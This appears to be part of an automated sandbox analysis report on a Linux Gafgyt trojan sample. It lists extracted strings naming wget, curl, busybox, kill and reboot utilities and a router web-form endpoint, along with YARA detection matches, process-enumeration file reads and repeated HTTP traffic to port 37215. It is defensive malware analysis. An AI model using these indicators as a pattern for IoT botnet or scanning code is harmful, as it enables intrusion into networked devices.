                  Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exe/var/Challenge//app/hi3511/gmDVRibox/usr/dvr_main _8182T_1108/mnt/mtd/app/gui/var/Kylin/l0 c/udevd/anko-app/ankosample _8182T_1104/var/tmp/sonia/hicorestm_hi3511_dvr/bin/busybox//usr/lib/systemd/systemd//usr/libexec/openssh/sftp-server/usr/shellmnt/sys//bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davinci/telnetsshwatchdog/var/spool//var/Sofia/sshd/usr/compress/bin//compress/bin/compress/usr/bashtelnetddropbearropbearencodercundi/var/cundi//var/Condi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//usr/lib/systemd//system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
                  Source: Initial sampleString containing 'busybox' found: wgetcurlbusybox/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep/proc/proc/%d/cmdlinerabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt3f
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: c0m5xRfolz.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: c0m5xRfolz.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: classification engineClassification label: mal100.troj.linELF@0/1025@100/0
                  Source: /usr/bin/xfdesktop (PID: 5519)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /usr/bin/xfdesktop (PID: 5543)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /usr/bin/xfdesktop (PID: 5549)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /usr/bin/xfdesktop (PID: 5560)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3760/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3761/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1583/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/2672/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/110/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3759/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/111/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/112/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/113/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/234/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1577/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/114/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/235/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/115/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/116/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/117/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/118/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/119/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/10/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/917/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3758/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/11/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/12/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/13/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/14/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/15/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/16/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/17/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/18/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/19/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1593/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/240/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/120/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3094/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/121/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/242/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3406/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/122/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/243/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/2/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/123/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/244/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1589/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/124/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/245/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1588/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/125/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/4/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/246/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3402/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/126/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/5/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/247/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/127/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/6/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/248/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/128/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/7/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/249/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/8/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/129/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/800/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/9/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/801/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/803/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/20/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/806/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/21/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/807/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/928/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/22/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/23/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/24/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/25/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/26/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/27/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/28/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/29/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3420/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/490/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/250/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/130/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/251/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/131/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/252/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/132/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/253/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/254/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/255/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/135/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/256/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1599/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/257/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/378/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/258/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/3412/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/259/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/30/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/35/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/1371/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/260/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/261/cmdlineJump to behavior
                  Source: /tmp/c0m5xRfolz.elf (PID: 5496)File opened: /proc/262/cmdlineJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56606 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34286 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48538 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53482 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40950 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34830 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53722 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60718 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53434 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45890 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36750 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60710 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52166 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47108 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37416 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60778 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39058 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35686 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43232 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54482 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43560 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59060 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55978 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34046 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44368 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60744 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50638 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38124 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58574 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58358 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44522 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42672 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51666 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43872 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45960 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60354 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44952 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48924 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51374 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32816 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42340 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52062 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44002 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60654 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43240 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47806 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40056 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47404 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52004 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34636 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47736 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52050 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54648 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47848 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44380 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38738 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59972 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46876 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36296 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37304 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54768 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52584 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50288 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40922 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35356 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33184 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34290 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55964 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47048 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33764 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37660 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53784 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44660 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50368 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40866 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40552 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37182 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59458 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53050 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55372 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58426 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53158 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59700 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33960 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43486 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49430 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55396 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48618 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39840 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41956 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53492 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58812 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51738 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34752 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39644 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48472 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34906 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42444 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33474 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45560 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36082 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60088 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44082 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37880 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56834 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58058 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56798 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58760 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51636 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56584 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52480 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60850 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59124 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47476 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36690 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40242 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58080 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33418 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35742 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46354 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60914 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40832 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33542 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42328 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60152 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40250 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35822 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53254 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52698 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56846 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33114 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47416 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59444 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57378 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38026 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52468 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39034 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46310 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33008 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51522 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36958 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52138 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35042 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60310 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47702 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38492 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43280 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40486 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51390 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51030 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60306 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36108 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55156 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51738 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59400 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41016 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38380 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57598 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47874 -> 37215
